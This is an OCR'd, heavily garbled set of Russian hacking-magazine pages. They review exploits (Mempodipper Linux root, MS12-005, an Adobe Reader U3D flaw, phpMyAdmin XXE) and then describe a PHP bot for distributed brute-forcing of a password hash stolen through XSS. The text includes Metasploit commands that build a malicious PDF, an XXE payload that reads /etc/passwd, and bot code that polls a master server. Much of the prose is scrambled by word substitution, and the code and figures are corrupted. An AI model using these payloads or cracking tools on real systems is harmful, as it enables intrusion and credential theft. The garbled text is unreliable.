Стало бы ть , получай обнаружение недостает никаких ограни ч е н ий - какой приглянется может это сде лать. Одн ако н а вслед пись равным образом прочитывание кое-какие ограничения вс ё­ таки хайло н овлены. Обратимся для коду функции, которая осущест вля­

ет запис ь lприведена шимоза ьк по части н аиболее важная пакет функции):

Чтобы следовать 14 сь пр ошла успешно, ее в долгу проводить либо самопроизвольно

п роцесс ltask==сuггепtl, либо папаня , трассирующий оный про­

static ssize_t mem_write( struct file * file, const char user * buf, size_t count, loff_t * ppos )

цесс вследствие рtгасе . Итиль зличные трюки не без; рtгасе безграмотный увенчались успехом,

позтому рассмотрим вид со task

==сuггепt. Чт относительно когда суд лично

после пишет н олигодон ные нам данны е себя во память? Очевидно, который н мастер своего дела во п ер­

вую караван интересуют процессы со атрибутом

! * ... *! struct task_struct * task=get_proc_task( file- >f_path.dentry- >d_inode);

/ * .. . *!

" уеееее

su: us er

mm=check_mem_permission(task); copied=PTR_ERR(mm); i f (IS_ERR(mm)) goto out_free;

!*

$ su

suid . Волга ссмо т рим su:

haw I am а cowboy" haw I am а cowboy doe s not exist

уеееее

Л егко заметить, что-то н а stdeгг выдается со тро ка, соз данная вместе с нашим

участием. Казалось бы, наша сестра можем относительно ткрыть /pгoc/< PID >/ mem , с п омощью lseeki) выискать нужное площадь во памяти , со через dup211 связать неоригинальный целый короб ошибок да файловый дескриптор откры­

*/ i f ( file- >privat e_data !=( void *)( ( long) current->self_exec_id)) goto out_mm;

того / pг oc/< PID>/mem, вписать нужные данные, а следовать т ем исполнить шелл-код . Однако малограмотный всё этак просто. Здесь выполняется вторая про­ верка , на ходе которой текущее важность

self_exec _ id со равнива ется

со значением, не без; поддержка что до щью которого был соз дан файловый дескать скри п ­

0* .. . * !

тор / pгoc /< PID>/mem. Значение self_exec_ id инкреме нтир уется при Здесь проводятся двум проверкидля предотвращения неавтори­ эованной записи: check_mem_peгmission равным образом

каждом запуске пр в отношении ц есса, оттого автор малограмотный можем п олучи тьд оступ ко

self_exec_id. Функция check_mem_pe гmission является азбучная истина обер т каковой ради __ check_

Тем безвыгодный менее, эту проверку не запрещается обставить : вместе с через foгkll ты да я созда­

памяти вышеизложенным способом.

mem_peгmission, чисто ч т об возлюбленная делает:

ем потомица да вн у три него от через execll со т артуем новомодный процесс.

static struct mm_struct * __ check_mem_permission( struct tas k_str uct * task )

значению у предка . Когда автор сих строк ради п ускаем execll, sel f_exec_id увеличи­

Наш форкнутый пр в отношении ц есс имеет значе ни е

self_exec_id , равное ее

вается для еди книзу у. В нашем пото мке автор сих строк открываем шаг мя ть пр е д ка равным образом

создаем файловый д ескриптор пользу кого /pгoc/<P ID пр е д ка>/mе m , благодаря тому что

struct mm_st ruct *mm;

возьми по части т крытие перевелся провер ок. В предке т ем временем после п ускаем

su

ч ерез execl l, таким образом урав н ивая значения self_exec_id. Д алее

mm=get_task_mm(task); i f (!mm) return ERR_PTR(-EINVAL );

от помощью, вроде выразился самоуправно соз правда те ль экс плоита , <<о чень черной

магии со кетов молод икс» п е р е даем предк уо ткрытый файловый д е ­ скриптор через п отомка равно возвращаемсяк вышеупомянутому сценарию

i f ( task

current) return mm;

dup2 -> ехес. Осталось понять, за какому адресу творить запись. По идее,

i f (task_is_stopped_or_traced(task)) {

ASLR

приходится отяготить нашу следовать д а ч у, одначе взгляни в это:

$ readelf -h / bin /s u 0 grep

Туре

Туре:

file)

ЕХЕС

(ExecutaЬle

Выв од нам как бы бы нам екает, сколько пакет

su использует из татич е­

ский а др йес сек ции .text !в ином случае был бы образ DYN, а малограмотный Е Х ЕС) . Это означает, ась?

su на большинстве дистрибутивов скомпи лиров ана Pl Е , со ледовательно, ASLR интересах секции .text ра бо­

вне использования

вор далеко не будет, что-нибудь у проща ет бумагомарание эксплоита.

И схо дный ко д эксплоита Mempodippeг д осту пен возьми exgloit-db .com , EDB-10 08411 . Пр име р е г касательно использования представлен сверху ск р равным образом нш о­ те.

it·!;lдJti Liпu x

>=2.6.39, 02-

равным образом 04-битные.

~i•J!Iiii•HI Д оверьобновлениеядрасвоемупакетномумене д жеруилиустанови Примерработыэксплоита

ХАКЕР ОЗ

/158/ 0012

Mempodipper

патч вручную.

057


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

0

MS12-005 Уязвимость процесса сборки

следавательности действий, требуемых ради запуска встроенного

·

СliсkОnсе-приложения из полными правами доступа IFull Tгustl. В результатевыполнения описанных превыше действий бери экране

~3

CVSSV2

011111 011 011 01 01 0

появится колонна диалоговых окон. Однако пользователю безвыгодный нужно

011 01

нисколько не без; ними готовить .

[AV N/AC M /дu .N /C C/I.C/AC)

Custom Animation'ы выполняются, эпизодически

PoweгPoint работает на ре ж да м е показа слайдов. Когда PoweгPoint на­

[]IШ

ходится во полноэкранном режиме, со временем выполнения каждогодей­

Найденная9язвимостьпозволяетвыполнитьпроизвольныйкодна

ствия анимации происходит возрождение фокуса. После запус~а

удаленной системесправами текущего пользователя. Для сего

СliсkОnсе-приложения наша сестра можем пересылать сведения диалоговым

читатель уязвимой системы повинен заскочить бери намеренно сфор­

окнам, с тем затянуть их.

мированную wеЬ-страницу либо — либо вскрыть умышленный обложка

Office.

Уязвимость присутствует во механизме безопасности

lj:JЦ!•Jii

Дело на том, что-то

Уязвимость, описанная во

Object Packageг. Object Packageг считает ClickOnce-фaйл безопасным, благодаря чему обложка такого вроде дозволительно насадить во грамота Office. Когда читатель уязвимой системы открывает документ, внедрен­

MS12-005, затрагивает двойка аспекта: 1. Метод определения исполняемого файла. Непропатченный packager.dll определяет, является ли обложка испол­

ный обложка автоматом выполняется . Напомню, почто

няемым, сопоставляя расширения файлов из элементами таблицы

ClickOnce- сие

!для уборная назовем ее ехесЕхtТаЫе).

методика развертывания, позволяющая творить самообновляе­ мые приложения

Windows,

которые могутустанавливаться равно запу­

.text:02FA1098 execExtTaЬle dd offset а_ехе ; DATA XREF: CPack age: :_GetCurrentlcon(~I C ~ )~69 0 о .text:02FA1D98 ; CPackaEe: :_Giv ewarni n gMsg { НWND__ * ) +5Е \ о .text:02FA1D98 ; " .ех е ~ .text:e2FA1D9C dd offset а - com ; " . сот -' .text:e2FA1Dдe dd offset а bat ~ " .bat" . text:02FA1DA4 dd offset а lnk " . ln k" .text :e2FA1DA8 dd offset а - cmd " .cmd" " . pif" .text:e2FA1DAC dd offset a_pif .text:e2FA1DB0 dd offset а - scr " . scr" .text:e2FA1DB4 dd offset а _js ; ". js " .text:e2 FA1DB8 dd offset а _jse ; ". j :se " . text:e2FA1DBC dd offset a_vbs _; ". vbs" . text: e2FA10Ce dd offset а - vbe ; ". vbe" .text:e2 FA1DC4 dd offset a_wsh ; " .wsh" .text:e2 FA1DC8 dd offset a_sct ~ " . stt ' .text:e2 FA1DCC dd offset a_vb _; " .vb" .text:e2FA1DD0 dd offset a_wsc ; " .wsc '~'~

скаться быть минимальном вмешательстве пользователя . Существует три способа публикации приложения

ClickOnce: из веб-страницы,

общего сетевого ресурса или — или носителя, так кусок движение кт-диска . Его можно поставить получи и распишись нотбук конечного пользователя равно запустить локально, инда ежели пэвм неграмотный подключен для сети, иначе привести в действие

во оперативном режиме, кроме установки каких-либо компонентов сверху

субноутбук конечного пользователя. При этом приложения

ClickOnce

могутобновляться самостоятельно, проверяя наличиедоступных новых версий да машинально заменяя по сию пору обновленные файлы. Для реализации атаки на данном случае используем специальным

образом сформированный обложка презентации PoweгPoint. Эта про­

грамма позволяет вынести Custom Animation'ы чтобы ОLЕ-пакетов . В предпочтение через обычных анимаций, да мы от тобой можем задатьдве специфичные

интересах OLE анимации [которые называются Object Actions): Activate

Contents [активировать содержимое) равно Edit Package [редактировать пакет). При Activate Contents выполняются те а действия, почто и при двойном щелчке пользователя в соответствии с встроенному объекту. Таким

образом,

Custom Animation'ы позволяют проводить в жизнь указанные немного

I!IEIEI

~ C:\Python27\python.exe О&мен

nакетами

Ответ Ответ Ответ

с

: возражение

от ОТ

с

вместе с

lb.wo~dp~e ss .com

02.233.69.6: 72.233.69.6: 72.233.69.6: 72.233.69.6:

ЧИСЛО ЧИСЛО ЧИСЛО ЧИСЛО

[72.233.69.6] no 02

& а ~т=32 &а~т=32 &а~т=32 &а~ т=32

В ре 0·1Я вреt·1Я вреt·1Я вреt·1Я

~татистика Ping nля 02.233.69.6: Пакетов: отnравлено=4, nолучено Приблизительное эпоха nриема - nереnачи

0,

0

0

Минимальное

=2 00t·1C =166t1c =168t·1C =166t1C

во

а

&а~т:

ТТL=127 ТТL=127 ТТL=127 ТТL=127

nот е ряно

=0 (0%

nотерь),

мс :

=166мсек, Максимальное=240 м со ек, Ср е nне е=185 м сек

C:,tmp)nslookup exploitshop.wo~dp~ess.com Can' t f ind se1•ve1' nате fo1• add1•ess 092 .168. 0. 0: Non - e x i ste n t domain ~e~ve~: google - puhlic - dns - a.google.com rdd~ess: 8.8.8.8

0***

~on-autho~itative answe~: ~ame: lb.wo~dp~ess.com ~dd~esses: 74.200.243.251, 1

02.233.2.58, 02.233.69.6, 06.74.254.120 76.74.254.123, 04.200.244.59

rliases:

exploitshop.wo~dp~ess. c om

C:,tm

>

Ре зу льтат эксплуатацииуязви мости- лукнутый

058

Python- скри пт

ХАКЕР

03/1 08/2012


Обзор эксплоитов

.text:e2FA1DD4 dd offset a_wsf .text:e2FA1DD8 dd offset a_wmz

pdf-~rser.py -о 0В

".wsf" " .wmz "

"sr .pdr -r

Просто прокручиваем во цикле этутаблицу равным образом смотрим, имеет ли встроенный обложка такое а расширение, во вкусе равным образом элементтаблицы. Д ля этого используется занятие l s P гogiOinlist:

push llh ; int dangerousTaЬle push offset execExtTaЬle .text:e2FA72FB push es i ; pExtName .text:e2FA72FC push е ; int . text: e2FA72FE call ?I sProgiDinl ist@@YGHPBG0PBQBGI@Z Is ProgiDinlist(ushort const * ,ushort co nst * , ; ushort const * const * ,uint) .text:e2 F AПF4 .text:e2FA72Fб

Нюанс состоит во том, сколько во таблице приведена только лишь часть существующих расширений пользу кого исполняемых файлов. В качестве примера не возбраняется занять ру либо — либо

pl. MS12-005 обходитэту проблемус по­

мощью функции AssoclsDangeгousl l , ко т орая проверяет расширения исполняемых файлов:

. text:e2FA6All push еах .text:e2FA6A12 call ds: __ imp__ AssocisDangerous@4 ; Assoc isDangerous(x) .text:e2FA6A18 test еах, еах . text:e2FA6Alд jnz short loc_2FA6A42

Вр е доно со же е не без; лошаденка ж равно м в рассуждении е 0D -о б ъекта во т е ле рdl - ф ай ла

А- псевдоним , лещадь которым должна взяться активирована реферат . РО- реферат должна активироваться, равно как всего-навсего открывает­ ся страница, содержащая аннотацию бери 0 D -данные.

lj:JЦ!e]ii Последовательностьзапу от ка объектов :

0. Вывод предупре ж дени й системы бе з опасности пользователю . packager.dll выдает предупреждения, лишь если файл является исполняемым. Н по отношению рассмотрим функцию CPackage __ _ GiveWaгningMsgi H WND hWndl . Она ещё проходит по мнению табли ц е

Объект 0 - мероприятие OpenAction инициирует воззвание к JavaScript. Объект 04-JavaScгipt ссылается нате мира 05. Объект 05- J avaScгipt-кoд применяеттехнику heap spraying,

ехесЕхtТаЫе, и, даже если расколачивание встроенного файла неграмотный содержится

после переходит получи и распишись вторую страницу.

на ехесЕхtТаЫе, никаких предупреждений безвыгодный выдается.

Объект 01-определение 0D-данных равно справочник их форматирова­

Пропатченный

ния.

Объект 0О - 0D-данные, которые будут представляться !вероятно, поврежденные!.

it·1;ldfjfi Windows ХР, Windows Vista, Windows Sегvег 0008 SP2, Windows 0.

fi•J!Iij[•J:I

Объект ы, н а которыеследуетобратить внима н ие :

Объект 0О -ссылается получи именованные словари I/3D, /U3DI. Объект 01- ссылается нате именованные словари I/3DI, /3DD, / 0D,

Существует обновление, устраняющее эту уязвимость.

/ 0DAI.

0

Уязвимость во Adobe UЗD-данных

Reader близ обработке

CVSSV2

00.0

01111 01 01 011 01 011111

011 0 IAV: N/АС: L/Au: N/ С: С/1: С/А: С)

0ШIШ

Уязвимость вызвана ошибкой рядом обработке U 0D-данных. Такая ошибка может дать повод ко сбою. П ри усище п ешной эксплуатации эта уязвимость позволяет злоумышлен ни ка м ввести полный контроль надсистем ой. Для обхода

DEP используется RОР-цепочка, icucnv36 .dll. Для обхода ASLR выполняет­ ся JavaScгipt-кoд, реализующий технику heap spraying. основанная возьми библиотеке

Кратко опишем U3D-компоненты, с намерением скорее пиндос мать, какие из них используетсплоит:

Объект 05 - заключает JаvаSсгiрt-коддля реализации heap spraying равным образом перенаправления в вторую страницу !инициирует

течение отображения 0D-данных ! . Сплоит реализован во Metasploit lпример из полезной нагрузкой на виде запуска калькулятора):

msf > use explo i t/windows/fileformat/adobe_reader_uЗd msf e x plo i t(adobe_reader_uЗd) > set pay l oad win dows/exec payload=> windows/exec msf e x p l o it (adobe_ reader_uЗd) > set cmd calc . exe cmd=> calc . exe msf ex p l oit ( adob e_ r eader_uЗd ) > show options Module options (exploit/windows/ fi leformat/adobe_reader_uЗd): Name Cu r rent Setting Required Descr i ption

U3D- держи настоящий пора один лишь п оддерживаемый под­ тип равным образом 0D - объект.

F I L ENAМE

0DD lнеобходимl - определяе т лавина иначе говоря словарник не без; 0D-данными,

OBFUSCATE

0DA lнеобязателенl - словарьактивации, размеряющий время,

msf.pdf false

yes по

The file name Е nаЫе JS obfuscation

подлежащими рендерингу.

если долженствует выражать 0D-данные .

Payload options (windows/exec): Name Current Setting Requ i red

Description

0D I Iнеобязателенl - п еременная логического т ипа, определяю­ щая коренной общественный порядок использования . Значение tгue соответствует интерактивному режиму,

DIS lнеобязателенl- имя, определяющее имущество 0D-данных придеактивации.

ХАКЕР ОЗ/ 0 0 0/ 0 01 0

CMD

calc.exe

yes

EXITFUNC

process

yes

false- взаимодействию вследствие JavaScript.

The comma nd string to execute Exit tec hni que: seh,thread,process,none

059


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Explpit target: Id Name е

<!ELEMENT foo ANY > <!ENTITY bar SYSTEM "file: /// etc / passwd" >

Adobe Reader 0.4.0 / 0.4.5 / 0.4.6

оп

Win

ХР SРЗ

msf exploit(adobe_reader_uЗd) > exploit [*] Creating 'msf.pdf' file .. . [+]

msf.pd~

> <foo>&bar;</foo>

stored at /home/pikofarad/.msf4/local/msf.pdf Здесь оnределяется nримитив Ьаг, какой ссылается нате обложка /et€/

i'·'.J1Jfi

passwd, равным образом nри обработкедокумента его начинка включается

Adobe Read eг 0.4.0 09.4.5 09.4.6 подина Windows ХР SP3.

на него. Кстати говоря, на ХМL-документ допускается далеко не только лишь вовлекать

локальные равно удаленные файлы.

,_i,J!Iiii•J:I

В нем дозволено стартовать исполняемые файлы, ежели парсеру раз­

заметано сие уделывать . По стандарту сие выглядит nримерно беспричинно :

Существует обновление, устраняющее эту уязвимость.

'

c?xml version="1.0 " encoding="utf-8" ?> < ! DОСТУРЕ foo

LFI во phpMyAdmin от ХХЕ-инъекцию

[

CVSSV2

<! ELEMENT foo ANY> <!NOTATION GIF SYSTEM "http: // my-cool-site.com/ ShowGif.exe" > с! ЕNПТУ bar SYSTEM "http ://not-my-cool-site.com/ bar.gif" NDATA GIF >

0.0

011111 011 011 011 01111

011 [AV:N/АС: L/Au :N/C : Р/1 :N/A:N 0

[DШ В начале возраст исследчик Магсо Batista опубликовал весьма интереснуюуяз вимо из тьтипа Loca l File lncluding. Эксnлуатируется

возлюбленная нетривиально, вследствие ХХ Е-инъекцию [ХХЕ -ХМ L eXteгnal Entity],

> cfoo>&bar; c/foo >

которая представляетсобой видоизменение ХМ L-инъекции .

Напомню , что-нибудь nри nомощи ХМL-инъекции [например, GЕТ­

В этом документе от п омо щью программы ShowGif.exe обрабатыва­

запроса для веб-серверу] позволительно обновить предмет ХМL­

ется гравюра baг.gif. В некоторых случаях пишущий сии строки можем насадить nо­

документа. Обычно беспокойство представляютфайлы базы данных

добную конструкцию чрез ХМ L-и нъекцию да претворить требуемый

xmiOB, гд е содержится исходны данные в отношении пользователя х:

код. Более подробная ан фа об ХМ L-инъекциях вкушать получи и распишись сайте OWASP

[goo.gi/BBG9C ]. c?xm l version="l . e" encoding="IS0-8859-1" ?> cusers > cuser > cusername> gandalf c/username> <password> !cЗ </password>

cuserid >0</user id > cmai l> /mail> </user>

lj:J4!•Jij В phpMyAdmin переводу нет круг обязанностей имnорта базы данны х с заданного пользователем ХМ L-фа йла. Уязвимос ть заключается во том, аюшки? по­ сле загрузки спецом сформированного ХМL-документа атаку­

ющий получает мочь [ограниченную nравами веб - сервера] прочит ать nрои зво льный обложка во системе или — или локальной сети.

Уязвимос ть держи хо дится на файле l ibгaгies\impoгt\x m l .php, где функция simplexml_load_stгing[] вызывается сверх проверки в су ще­

<user> cu sername> Stefane c/ username> cpa ssword> wlsЗc </password>

cuser id >500 </userid> cmail >Stefane@whysec . hmm </mail> </user>

ствование ссылки получи лицевой примитив:

$xml=simplexml_load_string($buffer, "SimpleXMLElement"J LIBXML_COMPACТ); Патченные версии phpMyAdmin с целью предотвращения инъекции

используют функцию l ibxml _disaЫe_e ntity_loadeг[], вовремя нежели за­

<user >

гружать ХМ L-документ.

Компания SECFORCE разработала часть для Metasploitдля экс­

< usernaшe> tony </username> <passwor d > UnбR34kЬ!e </ password >

cuserid> 000 </userid> cmail> s4tan@hell . com</mail> c/user> </ users >

плуатацииэтойуязвимости.ОнавтоматизируетnроцессLFiследую­ щи м образом:

0.

Логинится во phpMyAdmin со через предоставленных реквизи­ тов.

0.

СоздаетХМL-документ, применяя ХХЕ-инъекции ради заданного файла.

Смышленый пользователь помимо труда nроведет аналогию вместе с SQLинъекциями, а автор этих строк тем временем nерейду самотеком ко инъек­

0. 4.

Загружаетфайл сХМL-документом .

Пол у чаетуказанный обложка не без; серве ра.

циям подтипа ХХЕ . В плавдок ументах ХМ L существуюттак называемые

примитивы [entities], которые объявляются во начале плавдок уме нта на об­

Возможные оnции эксnлоита равным образом nример успешной эксплуатации в соответствии с ­

ласти ОТО. Существует небольшую толику видов возле м итивов, да теперь нас

казаны для скриншоте.

интересуюттолько внешние [e xteгnal entities]. Если во определении примитива присутствует URI, так спирт называет из ваш покорнейший слуга внешним. Соответ­ ственно, парсер приходится получитьдоступ для этому URI да привнести его со держимое во документ, даже если сие было задано, например, так:

c?xml version="1.0" encoding="utf-8" ?> < !DOCTYPE foo

060

if.1;Jдjfi PhpMyAdmin 0.4.х

вnлоть вплоть до 0.4.7. 0 равно 0.3.х вплоть по 0.3. 00.5.

f'·'••••t·'a

Обновиться худо-бедно впредь до вер эти phpMyAdmin 0.4.7. 0 [3 .3.1 0.5] либо

установи ть соо тветствующий патч . ::х::

ХАКЕР

03/158/2012


хакинг

lqbzllhttp ://essenzo.netl ·

ows КОДИМ БОТА_АЛЯ РАСПРЕДЕЛЕННЫХ ВЫЧИСЛЕНИИ Существует огромное количество bjt.ly/WdbrO -

языков программирования.

cлoвapи в целях брута

Кто-то выбрал к себя С, кто­ то-

ASM,

а кто-то-

Python.

Я,

например, отдал привилегия

ото Античата;

ш~ одинокий с консольных

брутеров;

www.l2ko.de кoнвepтep батников.

невыгодный самому экзотическому

языку- РНР. А всё потому, что ми чаще должно

На нашем диске ты сможешь раскопать

нести записки и заботы от вебом, нежели

весь необходимые

не без; десктопом. Но бывают да такие

файлы да исходники, описанные во статье.

моменты, нет-нет да и тебе нужен специализированный софт, а его просто-напросто нет.

00 U SPEAK ENGLISH? NO,

РНР

Однажды. изумительный времена очередных ковыряний появляющийся

XSS,

ко ми

на лаги попал хеш жете сверток аз многогрешный администратора нужного ми ресурса. Ко­ нечно же, его должен было расшифровать, равным образом аз многогрешный приёмом обратился к различным онлайн-сервисам, помогающим со расшифровкой. Ни безраздельно с них ми неграмотный помог. С этой душевной печалью моя персона отправился получи ха к-форумы, идеже

на специальных разделах оставил просьбу в рассуждении помощи на расшифров­ ке. Но да дальше меня ожидал фейл. Однако сайтик был полный изо себя расчудесный, да сеять его админку ми положительно невыгодный хотелось. Заварив очередную кружку кофе, пишущий эти строки начал думать, в духе поступить. Брутить получи и распишись своей машине далеко не получилось бы- вычислитель слабоват. Значит, нужно было в круглых цифрах схватить пэвм вместе с хорошими характе­

ристиками, да хорошо бы далеко не один. Покупать себя к родным пенатам

00

новых

мощных серваков про расшифровки одного хеша однова безвыгодный входи­ ло на мои планы. Поэтому мы купил ряд выделенных серверов для распределения вычислений у одного хостера. Осталось всего ничего- настроить расшифровку. И гляди шелковица аз многогрешный решил окунуться

062

ХАКЕР

03/158/2012


РНР-бот в целях

Windows

Комnилим кавасаки

на процесс. А n касательно чему бы далеко не набросать бота, пр равно н им ающего команду

function mySettings()

бери расшифровку хеш а вместе с общего сервера? М ож н в рассуждении б ыло да написать,

{

исключительно во задача заключалась во том, сколько автор этих строк з н ал исключительно скрипто­

$settings=file_get_contents( 'http://adres.com/?do=mysettings' ); if ($settings !='' )

вые языки, а не без; десктопом отроду безграмотный имел мол л а . И здесь во моей памя­ ти всплыла такая вещь, на правах всевозм по отношению жные р hр 0 е х е-компиляторы.

{ ОБЩАЯ СХЕМА

list($status, $statusdata) explode( ' 0' , $settings, 0 ); $config=array ( 'status'=> $status, 'data'=> $statusdata); return $config;

Бота ваш покорнейший слуга решил понудить функционировать по мнению в корне определенному плану. Итак , существует сервер, держи для относительно торый добавляются << За­ дания » . Боты отстукивают бери него каждые пятью минут, проверяя, не появилось ли пользу кого них новое задание.

И коли появилось, посылают серверу побудка относительно том, который б рут

начался. Сервер, во свою цепочка , добавляет на базу отметка что до том,

else return false;

который работает, а кто- нет. После завершения Брута лодка отправляе т серверу запрашивание со уведомлением, что такое? процесс окончена. Этот представление

да может кормить расшифровку. При этом нужно свершить так, Эта ф у н ко ция обращается для нашему гейту, ловит ответ, и, даже если

так чтобы боты использовали неодинаковые словари в целях брутфор са , в такой мере как брутить одиночный равным образом оный но лексика бог не обидел однажды не мудрствуя лукаво невыгодный имеет смысла. Также долженствует учесть, что такое? хеш ей может взяться много, отчего да мы из тобой

спирт малограмотный п у ст ой , делит его держи двум части там, идеже принимать кредо

0.

Первая

доля представляет из себя команду в целях бота, а вторая- допол­

безвыгодный станем бранить огульно конкорданс посредством брутфорс интересах каждого изо них.

нительные эмпирика чтобы этой команды. Теперь напишем функцию

В процессе б рута автор сих строк будем вмиг а сравнивать результаты со все-

брутфорса возьми основе заданных во виде аргумента хешей [массив) :

ми хешами, которые нужно расшифровать. Вообще, скрипт будет иметь просто-напросто небольшую толику функций равно выступит, что-то около сказать, во качестве

function bruteHashes($hashes)

обертки [шедулера), << дергающей>> сделано своевольно брутфорсер. Именно

{

того нам нужно выкроить таковский брутфорсер, какой-никакой работает

/1 Сохраняем хеыи чтобы брутера file_put_contents( './brute.txt' , implode( "\r\n" , $hashes));

посредством консоль, приближенно в духе подальше я переведем скрипт вехе, который тоже работает во консольной среде. Я использовал наработку моего знакомого- возлюбленная имеет такого типа синтаксис:

mdS.exe

{файл хешей} {файл словаря} {где сохранять}

Здесь центральный параметр-это этноним файла из хешами на

брутфорса [один хеш=одна строка), второстепенный параметр-название

// Говорим серверу, в чем дело? автор уж работаем file_get_contents( 'http://adres.master .servera.com/?do=iamworking' ); /1 Брутим passthru( 'mdS.exe brute.txt vocabulary.txt results.txt' );

файла со словарем, а завершающий параметр-название файла, в какой-никакой брутер полноте расшифровывать результаты . Задачи серве­ ра- верно учредить бота, повременно выскоблить рабочую

Сохраняем резу

$uploader

ьтат

получи

сервере

no

Ф

r

=ftp_connect( 'ftp://adres.master.servera.com' );

папку, а равным образом угощать сигналы об том, что такое? эпоха бы еще начать б рут объединение таким-то хешам. Для азбука напишем функцию обращения к серверу чтобы получения текущего задания:

ХАКЕР

03 /158/2 012

ftp_login($uploader, 'login' , 'password' ); ftp_put($uploader, './results/' .time(). ' .txt' ,

063


взлом -

'./results.txt' , FTP_ASCII);

Q

&~~

ftp_close($uploader); //

Говорим серверу,

-

-

Bat Т что касается Ехе Converter v1. 0

~(g] r8J

'~============~==============~l c=J c=J

~~'

.....-........

L __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

-~

сколько ты да я закончили

0---

file_get_coпteпts(

Visblty

'http://adres.•aster.servera.com/?do=iamfinished' ); }

\VorЬ-Iodir~tory

@ anontdirodory о т..._...,-

о---

Итак, цель беретик на качестве аргумента скопление от хе шами

ЕлаурЬоn

да сохраняет его на удобоваримом пользу кого брутера формате, в таком случае поглощать

0Et><тn>tlheor<I!J'10'

·-l

на виде текстового файла, во каждой строке которого находится один хеш. Затем лодка стучит получи и распишись сервер из сигналом по отношению том, что-то начал

работать. Это нужно ради того, дай тебе сер вер далеко не записывал бота в <<мерт вые >> машины, ежели симпатия никак не полноте выстукивать каждые пятью

0 Addv.sta _ _ _

минут !тайм-аут за умолчанию), равным образом помнил , что-нибудь кавасаки функционирует.

0 Adddeaщ>ieo'

Далее заводим самого бота, указав ему сформированный обложка хе ш ей,

Oo..r.nte-Res

определяемый словарник да обложка к сохранения результатов . Соз­

P.w~ter:

даем в свою очередь функцию <<ус тановки >> бота. Установка представляет собой перекачивание равным образом последующее оставление словаря, согласно которо­

С-'<

му нужно брутить: fuпctioп iпstallVocab{)

....t

01

Exit

01

Компилим рубашка дпя скрытного запуска брутера

{

$vocabulary=file_get_coпteпts( 'http://adres.com/unique_vocabulary.php' ); file_put_coпteпts( './vocabulary.txt' , $vocabulary);

равно по новой запускаем шедулер. Нужно учесть, что-то обложка словаря не­

обходим ранее около первом обращении для серверу, потому-то сделаем предохранитель, что подготавли вает словар ь равным образом запускает шедулер :

Серверный не без; крипт, ко которому обращается бот, принуждён воз­

ворочать офигенно уникальные словари, чтоб у каждой

if (!file_exists( './vocabulary.txt' ))

аппаратура был кровный <<с ловарный запас>>. Также стои т оставить возможно сть выменивать словник от через команды, отправляемой

iпstallVocab();

чере з мастер-сервер . Теперь но нам ничего не поделаешь накадит ь самую

} startScheduler();

главную функцию- функцию шедулера, выполняющую также команды мастер-сервера. Объем статьи отнюдь не позволяет повергнуть

компилим

после этого шифр этой функции полностью, оттого укажу просто-напросто ее кейсы

!полный шифр ищи сверху нашем диске):

Теперь, когда-когда да мы не без; тобой объединили всё сие во сам по части себе файл, преддверие нами

Ьгutе-брут;

встает проблема организовать с него настоящий ехе. В этом нам по­

сlеап- очистка данных , полученны х на результате предыдущих

может небольшая тулза со длинным названием

брутфорсов;

Compileг/Embeddeг.

iпstаll-установка;

Bamba lam

РНР ЕХЕ

Она представляет на лицо билдер, какой-никакой создает ехе изо РНР­

фай ла. Билдер вслед всё миг его использования ни разу неграмотный подво­

ехit-выход.

дил, работал отлично, не принимая во внимание всяки х ба го во !респект авторам!). Этот билдер позволяет компи струить экзешники на правах в целях РНР

По дефолту шедулер находи тс моя персона во режиме ожидания команд . В качестве тайм-аута наш брат указали

000

0.0, эдак

да чтобы

паче новых версий интерпретатора. В простейшем случае компи­

секунд. Это временной

кварта обращения б от на для нашему серверу. Далее ну что-нибудь ж включение

ляция во

Bambalam

выглядит смотри так:

команд вместе с учетом данных , переданных сервером боту, вдобавок по­

сле выполнения команды ты да я делаем пау зу lв некоторых случаях)

bamcompile

[-optioпs]

iпfile.php

[outfile . exe]

ОБЗОР КОМПИЛЯТОРОВ ИНТЕПРЕТИРУЕМЫХ ЯЗЫКОВ ПРОГРАММИРОВАНИЯ

0

РНР

bl

DeveiStudio

M<~miS4r

Однозначный вождь

0

Php2exe tmJylyi'{4Y_R

0

Bambalam Embedder Ьit.ly/wpSпiZ .

'

ру2ехе

Ьit.ly/3~

lilli..Y!:

0

Peri2Exe Ьit.ly/y29qШ

Преобразует первообразный

Более влиятельный инструмент,

Позволяет сочинять

в соответствии с конвертированию РНР­

адрес нате РНР во исnолняемый

безграмотный имеющий

скрипты,написанные

перевода перловки вехе .

скриптоввполноценные

файл. Чтобысозданное

интерфейса равно позволяющий

для Питоне, во экзешники.

Создает независимый исполняемый обложка ,

GUI-

Отличный механизм на

nрограммы . Тут

nриложемне могло

танцевальный шаг отковывать стоймя на рента .

Помимо исполняемого

равным образом визуальная мир

запуститься, на праздник но

Также комnилирует целые

файла, создаетнесколько

тот или иной работает на любых

программирования,

директории должна

проекты вместе с исnользованием

библиотек, помогающих

системах равно отнюдь не требует

да наладка кода,

быть дворец книги

различных библиотек,

готовой программе

интерпретатора .

равным образом включение различных

php5ts.dll.

наnример

заnуститься .

cURL.

модулей равным образом многое другое .

ХАКЕР

03/158/2012


РНР-бот на

Windows

Сервис cmdS.ru предлагает Вам собственность проверки стойкости различных видов хеш-кодов (SНAl, З2 b1t MDS, MD4, mysql и т .д.). Наша общество занимается вопросами компьютерной безопасности от 0006 года. База данных самая большая на мире

равным образом нате теперешний число охватывает недалеко

0,800,000,000,000 записей, 05% 50 Терабайт•

данных распределен по части кластеру да составляет

Пожалуйста Зарегистрируйтесь не в таком случае — не то Автошчуйтесь

.

-

....

с которых уникальны. Суммарный диапазон

. . -;. ·-f.,~ Сервис возьми базе распределенных вычислений на расшифровки МD5-хешей

Итак, кавасаки готов. Теперь займемся сервером. Во-первых, нужно зафиксировать во базе те боты, которые успешно отстучали нам

проходит объединение во всех отношениях файлам во папке гesults, чередуясь открывает их равно добавляет во базу.

х отя бы единовластно раз, в таком случае есть, круглым счетом сказать, установленные боты. Для

сего выполняется инспекция IР-адресов на базе [можно присвоить специальный идентификатор каждой машине, кто симпатия короче

ХАКЕРСКИЕ ФИЧИ Теперь перейдем для оптимизации нашего самопального комплекса .

делегировать всякий раз, чтоб разграничить в среде на вывеску ха сты,

Во-первых , брутер, кавасаки равным образом библиотеку допускается запаковать во единолично

находящиеся после NAT), позднее почему на базу добавляются те адреса,

экзешник, притом так, который течение функционирования бота достанет

